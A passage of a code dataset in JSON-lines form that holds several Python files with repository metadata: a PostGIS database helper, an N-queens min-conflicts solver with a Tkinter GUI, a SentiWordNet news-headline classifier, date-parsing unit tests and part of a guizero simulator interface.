None,\n db: str = 'gp'\n) -> Callable[[GeoDataFrame, str, str, bool], None]:\n\n engine = create_engine(__get_conn_string(db))\n\n if b_inspect and inspect_table:\n inspector = inspect(engine)\n print(inspector.get_columns(inspect_table))\n\n return partial(__write_to_postgis, log, engine)\n\n\ndef __execute_sql(\n log,\n engine,\n query_str: str,\n logging: bool = False,\n returns: bool = False,\n dry_run: bool = False\n) -> Union[None, list]:\n\n queries = query_str.split(';') if ';' in query_str else [query_str]\n queries = [query.strip() for query in queries if len(query.strip()) > 0]\n\n all_rows = []\n with engine.connect() as conn:\n for query in queries:\n log.info(f'{\"Executing SQL:\" if not dry_run else \"Skipping SQL:\"}\\n{query}')\n if dry_run:\n continue\n result = conn.execute(text(query))\n if result.cursor and (logging or returns):\n rows = result.fetchall()\n if logging:\n log.info('Result rows:')\n for row in rows:\n log.info(f'{row}')\n if returns:\n all_rows += rows\n if not dry_run:\n log.info('SQL execution finished')\n\n if returns:\n return all_rows\n\n\ndef get_sql_executor(\n log,\n db: str = 'gp'\n) -> Callable[\n [\n str, Union[bool, None], Union[bool, None], Union[bool, None]],\n Union[list, None]\n ]:\n\n engine = create_engine(__get_conn_string(db))\n return partial(__execute_sql, log, engine)\n\n\ndef get_db_table_names(\n execute_sql: Callable[[str], list]\n) -> List[str]:\n\n db_tables = execute_sql(\n '''\n SELECT table_name\n FROM 
information_schema.tables\n WHERE table_schema = 'public'\n ORDER BY table_name;\n ''',\n returns=True\n )\n return [r for r, in db_tables]\n\n\ndef read_db_table_to_df(table: str, db='gp') -> pd.DataFrame:\n engine = create_engine(__get_conn_string(db))\n with engine.connect() as conn:\n return pd.read_sql(f'SELECT * FROM {table}', conn)\n", "repo_name": "DigitalGeographyLab/green-path-server", "sub_path": "src/graph_build/graph_green_view_join/db.py", "file_name": "db.py", "file_ext": "py", "file_size_in_byte": 3179, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "41", "api": [{"api_name": "graph_build.graph_green_view_join.env.db_user", "line_number": 10, "usage_type": "attribute"}, {"api_name": "graph_build.graph_green_view_join.env", "line_number": 10, "usage_type": "name"}, {"api_name": "graph_build.graph_green_view_join.env.db_pass", "line_number": 10, "usage_type": "attribute"}, {"api_name": "graph_build.graph_green_view_join.env.db_host", "line_number": 10, "usage_type": "attribute"}, {"api_name": "graph_build.graph_green_view_join.env.db_port", "line_number": 10, "usage_type": "attribute"}, {"api_name": "geopandas.GeoDataFrame", "line_number": 16, "usage_type": "name"}, {"api_name": "sqlalchemy.create_engine", "line_number": 47, "usage_type": "call"}, {"api_name": "sqlalchemy.inspect", "line_number": 50, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 53, "usage_type": "call"}, {"api_name": "typing.Callable", "line_number": 45, "usage_type": "name"}, {"api_name": "geopandas.GeoDataFrame", "line_number": 45, "usage_type": "name"}, {"api_name": "sqlalchemy.text", "line_number": 74, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 63, "usage_type": "name"}, {"api_name": "sqlalchemy.create_engine", "line_number": 99, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 100, "usage_type": "call"}, {"api_name": "typing.Callable", "line_number": 93, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 95, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 96, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 104, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 105, "usage_type": "name"}, {"api_name": "sqlalchemy.create_engine", "line_number": 120, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 122, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 119, "usage_type": "attribute"}]} +{"seq_id": "664544022", "text": "\n# Solve N-queens problem using Min-conflicts algorithm\n'''\nYOUR TASKS:\n1. Read to understand the following code \n2. Give comments on the min_conflicts() function to show your comprehensive understanding of the code\n3. (Optional) Add GUI, animation...\n'''\n\nimport random\n\n#%% Utilities:\ndef argmin_random_tie(seq, key=lambda x: x):\n \"\"\"Return a minimum element of seq; break ties at random.\"\"\"\n items = list(seq)\n random.shuffle(items) #Randomly shuffle a copy of seq.\n return min(items, key=key)\n\nclass UniversalDict:\n \"\"\"A universal dict maps any key to the same value. 
We use it here\n as the domains dict for CSPs in which all variables have the same domain.\n >>> d = UniversalDict(42)\n >>> d['life']\n 42\n \"\"\" \n def __init__(self, value): self.value = value\n\n def __getitem__(self, key): return self.value\n\n def __repr__(self): return '{{Any: {0!r}}}'.format(self.value)\n\n\n#%% CSP\nclass CSP():\n \"\"\"This class describes finite-domain Constraint Satisfaction Problems.\n A CSP is specified by the following inputs:\n variables A list of variables; each is atomic (e.g. int or string).\n domains A dict of {var:[possible_value, ...]} entries.\n neighbors A dict of {var:[var,...]} that for each variable lists\n the other variables that participate in constraints.\n constraints A function f(A, a, B, b) that returns true if neighbors\n A, B satisfy the constraint when they have values A=a, B=b\n \"\"\"\n\n def __init__(self, variables, domains, neighbors, constraints):\n \"\"\"Construct a CSP problem. If variables is empty, it becomes domains.keys().\"\"\"\n #super().__init__(())\n variables = variables or list(domains.keys())\n self.variables = variables\n self.domains = domains\n self.neighbors = neighbors\n self.constraints = constraints\n self.curr_domains = None\n self.nassigns = 0\n\n def assign(self, var, val, assignment):\n \"\"\"Add {var: val} to assignment; Discard the old value if any.\"\"\"\n assignment[var] = val\n self.nassigns += 1\n\n def unassign(self, var, assignment):\n \"\"\"Remove {var: val} from assignment.\n DO NOT call this if you are changing a variable to a new value;\n just call assign for that.\"\"\"\n if var in assignment:\n del assignment[var]\n\n def nconflicts(self, var, val, assignment):\n \"\"\"Return the number of conflicts var=val has with other variables.\"\"\"\n\n # Subclasses may implement this more efficiently\n def conflict(var2):\n return var2 in assignment and not self.constraints(var, val, var2, assignment[var2])\n\n return count(conflict(v) for v in self.neighbors[var])\n\n # This is for min_conflicts search \n def conflicted_vars(self, current):\n \"\"\"Return a list of variables in current assignment that are in conflict\"\"\"\n return [var for var in self.variables\n if self.nconflicts(var, current[var], current) > 0]\n\n\n#%% N-queens problem\ndef queen_constraint(A, a, B, b):\n \"\"\"Constraint is satisfied (true) if A, B are really the same variable,\n or if they are not in the same row, down diagonal, or up diagonal.\"\"\"\n return A == B or (a != b and A + a != B + b and A - a != B - b)\n\nclass NQueensCSP(CSP):\n \"\"\"\n Make a CSP for the nQueens problem for search with min_conflicts.\n Suitable for large n, it uses only data structures of size O(n).\n Think of placing queens one per column, from left to right.\n That means position (x, y) represents (var, val) in the CSP.\n The main structures are three arrays to count queens that could conflict:\n rows[i] Number of queens in the ith row (i.e. 
val == i)\n downs[i] Number of queens in the \\ diagonal\n such that their (x, y) coordinates sum to i\n ups[i] Number of queens in the / diagonal\n such that their (x, y) coordinates have x-y+n-1 = i\n \"\"\"\n\n def __init__(self, n):\n \"\"\"Initialize data structures for n Queens.\"\"\"\n CSP.__init__(self, list(range(n)), UniversalDict(list(range(n))),\n UniversalDict(list(range(n))), queen_constraint)\n\n self.rows = [0] * n\n self.ups = [0] * (2 * n - 1)\n self.downs = [0] * (2 * n - 1)\n\n def nconflicts(self, var, val, assignment):\n \"\"\"The number of conflicts, as recorded with each assignment.\n Count conflicts in row and in up, down diagonals. If there\n is a queen there, it can't conflict with itself, so subtract 3.\"\"\"\n n = len(self.variables)\n c = self.rows[val] + self.downs[var + val] + self.ups[var - val + n - 1]\n if assignment.get(var, None) == val:\n c -= 3\n return c\n\n def assign(self, var, val, assignment):\n \"\"\"Assign var, and keep track of conflicts.\"\"\"\n old_val = assignment.get(var, None)\n if val != old_val:\n if old_val is not None: # Remove old val if there was one\n self.record_conflict(assignment, var, old_val, -1)\n self.record_conflict(assignment, var, val, +1)\n CSP.assign(self, var, val, assignment)\n\n def unassign(self, var, assignment):\n \"\"\"Remove var from assignment (if it is there) and track conflicts.\"\"\"\n if var in assignment:\n self.record_conflict(assignment, var, assignment[var], -1)\n CSP.unassign(self, var, assignment)\n\n def record_conflict(self, assignment, var, val, delta):\n \"\"\"Record conflicts caused by addition or deletion of a Queen.\"\"\"\n n = len(self.variables)\n self.rows[val] += delta\n self.downs[var + val] += delta\n self.ups[var - val + n - 1] += delta\n\n\n#%% Min-conflicts for CSPs\n''' READ AND COMMENT to show your comprehensive understanding of the following function '''\ndef min_conflicts(csp, max_steps=100000):\n \"\"\"See Figure 6.8 for the algorithm\"\"\"\n csp.current = current = {} # start from an empty assignment and build a complete one\n for var in csp.variables: # greedy initialisation: each variable gets the value that\n value = min_conflicts_value(csp, var, current) # conflicts least with what has been assigned so far\n csp.assign(var, value, current)\n \n for i in range(max_steps): # local search: repair one conflicted variable per step\n conflicted = csp.conflicted_vars(current) # variables currently violating some constraint\n if not conflicted: # no conflicts left -> a solution has been found\n return current\n var = random.choice(conflicted) # pick a random conflicted variable...\n value = min_conflicts_value(csp, var, current) # ...and move it to its least-conflicting value\n csp.assign(var, value, current)\n return None # give up after max_steps without finding a solution\n\ndef min_conflicts_value(csp, var, current):\n \"\"\"Return the value that will give var the least number of conflicts.\n If there is a tie, choose at random.\"\"\"\n return argmin_random_tie(csp.domains[var], key=lambda val: csp.nconflicts(var, val, current))\n\n\nfrom tkinter import *\nfrom tkinter import messagebox\nfrom PIL import ImageTk, Image\n\ndef resize_img(img, new_width) :\n '''\n Resize an image and maintain its aspect ratio\n Input : img, new_width\n Output: new image has width = new_width\n '''\n wpercent = (new_width / float(img.size[0]))\n hsize = int((float(img.size[1]) * float(wpercent)))\n img = img.resize((int(new_width), hsize), Image.ANTIALIAS) # note: Image.ANTIALIAS was renamed to Image.LANCZOS in Pillow >= 10\n\n return img\n\n#%% GUI\nclass Ui_NQueens:\n '''GUI for NQueens'''\n def __init__(self, default_no_of_queens):\n self.queen_img = 0\n self.no_of_queens = default_no_of_queens\n\n self.window = Tk()\n self.window.title(\"Solve N Queens on chessboard with Min conflicts\")\n\n # split the window into two frames, left_frame and right_frame\n # based on code by user CommonSense:\n # link https://stackoverflow.com/questions/46522200/how-to-make-two-split-up-screen-canvas-inside-the-python-tkinter-window\n 
self.left_frame = Frame(self.window, borderwidth=0, relief=\"solid\")\n self.right_frame = Frame(self.window, borderwidth=0, relief=\"solid\")\n self.left_frame.pack(side=\"left\", expand=True, fill=\"both\")\n self.right_frame.pack(side=\"right\", expand=True, fill=\"both\")\n\n # Create the canvas that displays the chessboard\n self.canvas = Canvas(master=self.left_frame, width=980, height=980, background=\"black\")\n self.canvas.pack()\n\n # Create the label showing 'No of queens:'\n self.label_no_queens = Label(master=self.right_frame, text='No of queens:')\n self.label_no_queens.pack()\n\n # Create the textbox holding the number of queens\n self.entry_no_queens = Entry(master=self.right_frame, justify='center', width = 10)\n self.entry_no_queens.insert(0, str(self.no_of_queens))\n self.entry_no_queens.bind(\"<Return>\", lambda x: self.set_no_queens(self.entry_no_queens.get())) # pressing Enter re-runs the solver\n self.entry_no_queens.pack()\n\n # Create the 'Min conflicts' solve button\n self.button_solve = Button(master=self.right_frame, text='Min conflicts', command=lambda:self.set_no_queens(self.entry_no_queens.get()))\n self.button_solve.pack()\n\n self.update_canvas()\n self.set_no_queens(self.entry_no_queens.get())\n\n def update_canvas(self, list_queens = None, black_cell_color = '#949698', white_cell_color = '#fafafa', margin = 5):\n ''' Update the canvas using \"list_queens\" (if given) '''\n\n self.canvas.update()\n # get the canvas size\n cell_width = (self.canvas.winfo_width() - margin * 2) / self.no_of_queens\n cell_height = (self.canvas.winfo_height() - margin * 2) / self.no_of_queens\n\n # choose the cell size\n cell_size = cell_width if (cell_height > cell_width) else cell_height\n\n x, y = margin, margin\n # draw the cells of the board\n for i in range(self.no_of_queens):\n for j in range(self.no_of_queens) :\n x1, y1 = x, y\n x2, y2 = x1 + cell_size, y + cell_size\n\n # Draw a rectangle\n # reference: http://zetcode.com/tkinter/drawing/\n if ((i + j) % 2 == 0) : # draw a white cell\n self.canvas.create_rectangle(x1, y1, x2, y2, outline=\"\", fill=white_cell_color)\n else : # draw a black cell\n self.canvas.create_rectangle(x1, y1, x2, y2, outline=\"\", fill=black_cell_color)\n\n x = x + cell_size\n x = margin\n y = y + cell_size\n \n # Image source: https://www.pngbarn.com/png-image-lfeqi\n raw_queen_img = Image.open('img\\queen.png')\n self.queen_img = ImageTk.PhotoImage(resize_img(raw_queen_img, cell_size))\n\n # display the queens according to list_queens\n if (list_queens != None):\n for j in range(self.no_of_queens) :\n if (list_queens[j] != -1):\n x = margin + cell_size * j\n y = margin + cell_size * list_queens[j]\n self.canvas.create_image(x, y, anchor = NW, image=self.queen_img)\n\n def set_no_queens(self, input_value):\n '''Set no of queens by input textbox'''\n try:\n self.no_of_queens = int(input_value)\n if(self.no_of_queens < 4) :\n messagebox.showinfo(\"Error\",\"You must enter a positive integer greater than 3\")\n return\n except ValueError:\n messagebox.showinfo(\"Error\",\"You 
must enter a positive integer greater than 3\")\n return\n\n self.update_canvas()\n\n queens_problem = NQueensCSP(n=self.no_of_queens)\n min_conflicts(queens_problem, max_steps=100000)\n result = queens_problem.current\n\n if (result) :\n self.update_canvas(queens_problem.current)\n messagebox.showinfo(\"Done\",\"The queens have been placed successfully\")\n else :\n messagebox.showinfo(\"Error\",\"No arrangement could be found\")\n\n#%% Main program\ndef main():\n ui = Ui_NQueens(default_no_of_queens = 50)\n ui.window.mainloop()\n\nif __name__ == '__main__':\n main()\n\n", "repo_name": "quockhanhtn/artificial_intelligence_exercise", "sub_path": "ex6_n_queens_with_min_conflicts/ex6_main.py", "file_name": "ex6_main.py", "file_ext": "py", "file_size_in_byte": 12503, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "random.shuffle", "line_number": 16, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 159, "usage_type": "call"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 182, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 182, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 255, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 255, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 256, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 256, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 271, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 271, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 274, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 274, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 285, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 285, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 287, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 287, "usage_type": "name"}]}
{"seq_id": "36994519169", "text": "# Script to classify stock-related news headlines.\n# Base: Sentiwordnet 3.0\nimport pandas as pd\nimport nltk\nimport re\nfrom pandas import DataFrame\nfrom nltk.stem.porter import PorterStemmer\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sqlalchemy import create_engine\n\n# Convert positive/negative scores into a single valence label\ndef create_label(row):\n return int(10*(row['PosScore'] - row['NegScore']))\n\n# Stemming\ndef stem_tokens(tokens, stemmer):\n stemmed = [stemmer.stem(item) for item in tokens]\n return(stemmed)\n\n# Tokenization\ndef tokenize(text):\n text = re.sub(\"[^a-zA-Z]\", \" \", text)\n tokens = nltk.word_tokenize(text)\n stems = stem_tokens(tokens, stemmer)\n return(stems)\n\n# Read SentiWordNet 3.0 into a dataframe and clean up the data.\n# After the cleanup the table keeps the columns: Pos Neg Word\ndf = pd.read_csv('SentiWordNet_3.0.0_20130122.txt', comment = '#', sep='\\t')\ndf.drop(df.columns[[0, 1, 5]], axis=1, inplace=True)\ndf.drop(df.tail(1).index,inplace=True)\n\n# Process the wordnet to obtain a single label for each word...\ndf['label'] = df.apply (lambda row: create_label (row),axis=1)\n\n# Test Data\nengine = create_engine('sqlite:///news.db')\ntable_name = 'news_table'\ntest_df = pd.read_sql_table(table_name, engine)\n\nstemmer = 
PorterStemmer()\n\nvectorizer = CountVectorizer(\n analyzer = 'word',\n tokenizer = tokenize,\n lowercase = True,\n stop_words = 'english'\n)\n\ntrain_data = df['SynsetTerms']\ntrain_labels = df['label']\ntest_data = test_df['title']\n\ntrain_vectors = vectorizer.fit_transform(train_data.values.astype('U'))\ntest_vectors = vectorizer.transform(test_data.values.astype('U'))\n\n# Classification\nclassifier = MultinomialNB(alpha=0.01)\nclassifier.fit(train_vectors, train_labels)\nprediction = classifier.predict(test_vectors)\nprobabilities = classifier.predict_proba(test_vectors)\n\n# Output\ns = pd.Series(prediction)\nprint(s.value_counts())\n\ntest_df['valence'] = prediction \n\n# Write the classification to the database.\ntest_df = test_df.drop('index', axis = 1)\ntest_df.to_sql('news_table', engine, if_exists='replace')\n\n# Create a table identifying the classifier used.\nclass_df = pd.DataFrame(['SentiwordNet'], columns=['classifier'])\nclass_df.to_sql('classifier_table', engine, if_exists='replace')", "repo_name": "fabiograssiotto/stocks_proj", "sub_path": "classify-senti.py", "file_name": "classify-senti.py", "file_ext": "py", "file_size_in_byte": 2391, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "re.sub", "line_number": 23, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 24, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 30, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 38, "usage_type": "call"}, {"api_name": "pandas.read_sql_table", "line_number": 40, "usage_type": "call"}, {"api_name": "nltk.stem.porter.PorterStemmer", "line_number": 42, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 44, "usage_type": "call"}, {"api_name": "sklearn.naive_bayes.MultinomialNB", "line_number": 59, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 65, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 75, "usage_type": "call"}]}
{"seq_id": "664544022", "text": "\"\"\"Tests for the ``Date`` class\"\"\"\n\nimport string\nfrom argparse import ArgumentTypeError\nfrom datetime import date\nfrom unittest import TestCase\n\nfrom bank import settings\nfrom bank.cli.types import Date\n\n\nclass BlankArgument(TestCase):\n \"\"\"Test type casting behavior for blank strings\"\"\"\n\n def test_blank_string_error(self) -> None:\n \"\"\"Test an ``ArgumentTypeError`` is raised for a blank string\"\"\"\n\n with self.assertRaises(ArgumentTypeError):\n Date('')\n\n def test_whitespace_string_error(self) -> None:\n \"\"\"Test ``ArgumentTypeError`` is raised when the string is whitespace\"\"\"\n\n for char in string.whitespace:\n with self.assertRaises(ArgumentTypeError):\n Date(char)\n\n\nclass DateCasting(TestCase):\n \"\"\"Test type casting against various date formats\"\"\"\n\n def test_invalid_value_err(self) -> None:\n \"\"\"Test an ``ArgumentTypeError`` is raised for strings not representing valid dates\"\"\"\n\n with self.assertRaises(ArgumentTypeError):\n Date('this is not a date')\n\n def test_invalid_format_err(self) -> None:\n \"\"\"Test an ``ArgumentTypeError`` is raised for valid dates using the wrong string format\"\"\"\n\n test_date = date(2000, 11, 12)\n test_format = '%b %d %Y'\n\n self.assertNotEqual(test_format, settings.date_format)\n with self.assertRaises(ArgumentTypeError):\n Date(test_date.strftime(test_format))\n\n def 
test_valid_format(self) -> None:\n \"\"\"Test date strings matching the format in application settings are returned as date objects\"\"\"\n\n test_date = date(2000, 11, 12)\n test_date_str = test_date.strftime(settings.date_format)\n self.assertEqual(test_date, Date(test_date_str))\n", "repo_name": "pitt-crc/bank", "sub_path": "tests/cli/types/test_Date.py", "file_name": "test_Date.py", "file_ext": "py", "file_size_in_byte": 1758, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "unittest.TestCase", "line_number": 12, "usage_type": "name"}, {"api_name": "argparse.ArgumentTypeError", "line_number": 18, "usage_type": "argument"}, {"api_name": "bank.cli.types.Date", "line_number": 19, "usage_type": "call"}, {"api_name": "string.whitespace", "line_number": 24, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentTypeError", "line_number": 25, "usage_type": "argument"}, {"api_name": "bank.cli.types.Date", "line_number": 26, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 29, "usage_type": "name"}, {"api_name": "argparse.ArgumentTypeError", "line_number": 35, "usage_type": "argument"}, {"api_name": "bank.cli.types.Date", "line_number": 36, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 41, "usage_type": "call"}, {"api_name": "bank.settings.date_format", "line_number": 44, "usage_type": "attribute"}, {"api_name": "bank.settings", "line_number": 44, "usage_type": "name"}, {"api_name": "argparse.ArgumentTypeError", "line_number": 45, "usage_type": "argument"}, {"api_name": "bank.cli.types.Date", "line_number": 46, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 51, "usage_type": "call"}, {"api_name": "bank.settings.date_format", "line_number": 52, "usage_type": "attribute"}, {"api_name": "bank.settings", "line_number": 52, "usage_type": "name"}, {"api_name": "bank.cli.types.Date", "line_number": 53, "usage_type": "call"}]}
{"seq_id": "27346968574", "text": "\nfrom guizero import App, ListBox, PushButton, Box, Text, info, Slider, CheckBox\nfrom utils.simulator import Environment\nfrom os import listdir\nfrom os.path import isfile, join\nfrom training.training import Training\n\n\nclass Guizero:\n \"\"\"A simple and intuitive interface to create graphical user interfaces (GUIs)\"\"\"\n\n def __init__(self, env_width, env_height, multiplier, fake_collision_mt, door_fake_collision_mt):\n self._env_width = env_width\n self._env_height = env_height\n self._multiplier = multiplier\n self.listbox = None\n self._environment = Environment(env_width, env_height, multiplier, fake_collision_mt,\n door_fake_collision_mt)\n self.training = Training(env_width, env_height, multiplier, self._environment)\n self.green = (0, 255, 0)\n self.orange = (255, 200, 140)\n self.pink = (255, 210, 210)\n self.yellow = (255, 255, 150)\n self.light_green = (150, 255, 150)\n\n self.app = App(title=\"Procedural Environment Neuro-symbolic Agent\", width=800, height=600)\n self.menu_box = Box(self.app, layout=\"grid\", width=800, height=260)\n Box(self.menu_box, height=50, width=800, grid=[0, 0])\n Box(self.menu_box, height=20, width=800, grid=[0, 2])\n Box(self.menu_box, height=20, width=800, grid=[0, 4])\n Box(self.menu_box, height=20, width=800, grid=[0, 6])\n PushButton(self.menu_box, command=self.view_generated_envs, text=\"Visualize generated environments\",\n width=40,\n height=1, grid=[0, 1])\n PushButton(self.menu_box, command=self.go_to_sight_generation_cmd, 
text=\"Generate new environments\", width=30,\n height=1, grid=[0, 3])\n PushButton(self.menu_box, command=self.train_agent_cmd, text=\"Train the Agent\", width=30, height=1, grid=[0, 5])\n\n ###GPU###\n PushButton(self.menu_box, command=self.view_gpus, text=\"Check GPU Availability\",\n width=30,\n height=1, grid=[0, 7])\n self.gpu_view_box = Box(self.app, visible=False, layout=\"grid\")\n Box(self.gpu_view_box, height=40, width=50, grid=[0, 0])\n gpu_button_box = Box(self.gpu_view_box, height=40, width=300, layout=\"grid\", grid=[0, 2])\n PushButton(gpu_button_box, command=self.view_gpu_back_cmd, text=\"Back\", grid=[1, 0])\n #########\n\n self.env_view_box = Box(self.app, visible=False, layout=\"grid\")\n Box(self.env_view_box, height=40, width=50, grid=[0, 0])\n view_button_box = Box(self.env_view_box, height=40, width=300, layout=\"grid\", grid=[0, 2])\n PushButton(view_button_box, command=self.view_cmd, text=\"Visualize\", grid=[0, 0])\n PushButton(view_button_box, command=self.view_env_back_cmd, text=\"Back\", grid=[1, 0])\n\n self.generation_env_box = Box(self.app, visible=False, layout=\"grid\")\n self.generation_env_box1 = Box(self.generation_env_box, visible=False, layout=\"grid\", grid=[0, 1])\n self.generation_env_box2 = Box(self.generation_env_box, visible=False, layout=\"grid\", grid=[1, 1])\n self.generation_env_button = Box(self.generation_env_box, visible=False, layout=\"grid\", grid=[0, 3])\n\n Box(self.generation_env_box, height=40, width=50, grid=[0, 0])\n Text(self.generation_env_box1, text=\"Number of bedrooms:\", grid=[0, 0], size=10, bg=self.light_green)\n self.sliderBR = Slider(self.generation_env_box1, horizontal=True, end=2, grid=[1, 0])\n self.sliderBR.__setattr__(\"bg\", self.light_green)\n\n Text(self.generation_env_box2, text=\"MAX beds:\", grid=[0, 0], size=10, bg=self.light_green)\n self.sliderBR_B = Slider(self.generation_env_box2, horizontal=True, end=2, grid=[1, 0])\n Text(self.generation_env_box2, text=\"MAX cabinets:\", grid=[0, 1], size=10, bg=self.light_green)\n self.sliderBR_W = Slider(self.generation_env_box2, horizontal=True, end=2, grid=[1, 1])\n\n Box(self.generation_env_box1, height=40, width=50, grid=[0, 1])\n\n Text(self.generation_env_box1, text=\"Number of bathrooms:\", grid=[0, 2], size=10, bg=self.pink)\n self.sliderBAR = Slider(self.generation_env_box1, horizontal=True, end=2, grid=[1, 2])\n self.sliderBAR.__setattr__(\"bg\", self.pink)\n Text(self.generation_env_box2, text=\"MAX water:\", grid=[0, 2], size=10, bg=self.pink)\n self.sliderBAR_T = Slider(self.generation_env_box2, horizontal=True, end=1, grid=[1, 2])\n Text(self.generation_env_box2, text=\"MAX showers:\", grid=[0, 3], size=10, bg=self.pink)\n self.sliderBAR_S = Slider(self.generation_env_box2, horizontal=True, end=1, grid=[1, 3])\n Text(self.generation_env_box2, text=\"MAX sinks:\", grid=[0, 4], size=10, bg=self.pink)\n self.sliderBAR_SI = Slider(self.generation_env_box2, horizontal=True, end=1, grid=[1, 4])\n\n Box(self.generation_env_box1, height=40, width=50, grid=[0, 3])\n\n Text(self.generation_env_box1, text=\"Number of kitchens:\", grid=[0, 4], size=10, bg=self.yellow)\n self.sliderKI = Slider(self.generation_env_box1, horizontal=True, end=2, grid=[1, 4])\n self.sliderKI.__setattr__(\"bg\", self.yellow)\n\n Text(self.generation_env_box2, text=\"MAX tables:\", grid=[0, 5], size=10, bg=self.yellow)\n self.sliderKI_KTA = Slider(self.generation_env_box2, horizontal=True, end=1, grid=[1, 5])\n Text(self.generation_env_box2, text=\"MAX balconies:\", grid=[0, 6], size=10, 
bg=self.yellow)\n self.sliderKI_D = Slider(self.generation_env_box2, horizontal=True, end=3, grid=[1, 6])\n\n Box(self.generation_env_box1, height=40, width=50, grid=[0, 5])\n\n Text(self.generation_env_box1, text=\"Number of halls:\", grid=[0, 6], size=10, bg=self.orange)\n self.sliderHA = Slider(self.generation_env_box1, horizontal=True, start=1, end=1, grid=[1, 6])\n self.sliderHA.__setattr__(\"bg\", self.orange)\n\n Text(self.generation_env_box2, text=\"MAX tables:\", grid=[0, 7], size=10, bg=self.orange)\n self.sliderHA_HT = Slider(self.generation_env_box2, horizontal=True, end=1, grid=[1, 7])\n Text(self.generation_env_box2, text=\"MAX sofa:\", grid=[0, 8], size=10, bg=self.orange)\n self.sliderHA_SO = Slider(self.generation_env_box2, horizontal=True, end=2, grid=[1, 8])\n Text(self.generation_env_box2, text=\"MAX shelves:\", grid=[0, 9], size=10, bg=self.orange)\n self.sliderHA_CB = Slider(self.generation_env_box2, horizontal=True, end=2, grid=[1, 9])\n\n Box(self.generation_env_box, height=40, width=50, grid=[0, 2])\n\n PushButton(self.generation_env_button, command=self.generate_cmd, text=\"Generate Environments\", grid=[0, 0])\n PushButton(self.generation_env_button, command=self.view_generation_back_cmd, text=\"Back\", grid=[1, 0])\n\n self.train_box_view = Box(self.app, visible=False, layout=\"grid\")\n env_files = [f for f in listdir(\"./environments\") if isfile(join(\"./environments\", f)) and f != \"null\"]\n env_files = sorted(env_files)\n self.listbox2 = ListBox(self.train_box_view, items=env_files, scrollbar=True, width=350, height=350,\n grid=[0, 1])\n self.render_on = CheckBox(self.train_box_view, text=\"Render On\", grid=[0, 3])\n self.render_on.toggle()\n self.logic_drive_on = CheckBox(self.train_box_view, text=\"Logic Drive On\", grid=[0, 4])\n self.video_rec_on = CheckBox(self.train_box_view, text=\"Video REC On\", grid=[0, 5])\n Box(self.train_box_view, height=40, width=50, grid=[0, 0])\n view_button_box2 = Box(self.train_box_view, layout=\"grid\", grid=[0, 2])\n PushButton(view_button_box2, command=self.train_cmd, text=\"Train\", grid=[0, 0])\n PushButton(view_button_box2, command=self.view_train_back_cmd, text=\"Back\", grid=[1, 0])\n\n self.app.display()\n\n def update_files(self):\n env_files = [f for f in listdir(\"./environments\") if isfile(join(\"./environments\", f)) and f != \"null\"]\n env_files = sorted(env_files)\n self.listbox = ListBox(self.env_view_box, items=env_files, scrollbar=True, width=350, height=350, grid=[0, 1])\n self.listbox2 = ListBox(self.train_box_view, items=env_files, scrollbar=True, width=350, height=350,\n grid=[0, 1])\n\n def view_generated_envs(self):\n self.update_files()\n self.menu_box.hide()\n self.env_view_box.show()\n\n def go_to_sight_generation_cmd(self):\n self.menu_box.hide()\n self.generation_env_box.show()\n self.generation_env_box1.show()\n self.generation_env_box2.show()\n self.generation_env_button.show()\n\n def train_agent_cmd(self):\n self.update_files()\n self.menu_box.hide()\n self.train_box_view.show()\n\n def view_cmd(self):\n self.training.load_model(self.listbox.value, self.render_on.value)\n self.training._env_width = self._env_width\n self.training._env_height = self._env_height\n self.training._multiplier = self._multiplier\n self._environment._rooms = self.training._rooms\n self._environment._agent = self.training._agent\n self._environment._objective = self.training._objective\n self._environment._floor = self.training._floor\n self._environment._screen = self.training._screen\n 
